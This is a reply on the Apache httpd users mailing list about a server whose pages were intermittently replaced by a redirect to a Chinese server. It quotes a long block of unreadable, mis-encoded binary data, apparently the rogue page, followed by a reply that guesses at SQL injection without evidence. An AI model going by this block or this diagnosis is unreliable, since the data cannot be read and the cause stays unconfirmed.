> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ
> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕
> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q
> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>
> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя
> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
> ╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
> ¤
>
> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci
> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
> ▄щсМ├
>
> би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф
> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
> SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>
> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨
> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>
> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
> ╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@
> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>
> ==================
> The address indicated in the begining of the page code leads to some chinese
> server.
> So, somehow it happened that the output of the apache server was substituted
> by this page, which redirected visitors to some chinese server.
>
> But the most strange thing was that the problem dissapeared itself! So, it
> last for 10 minutes then disappeared! And the again started and again
> dissapeared. Finally, I turned down apache untill I understand what is going
> on...
>
> Any idea how could that happen? How to reproduce this? How to prevent?
> Where to look for logs? I have check both ssh logs and apache logs, there is
> nothing that could seem unusual there...
>
> Any help is appreciated.
> Oleg.
>
Oleg,
Are you running any sort of MySQL Database on this machine, and if so is it
patched and fully updated along with any php scripts. What you are showing us
is indicative of a SQL Injection Attack.
Shocked no one has mentioned especially with the rampant incline of the Russian
Business Network to spread its malware through the use of SQL Injection on any
vulnerable website.
Thanks,
Daniel
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org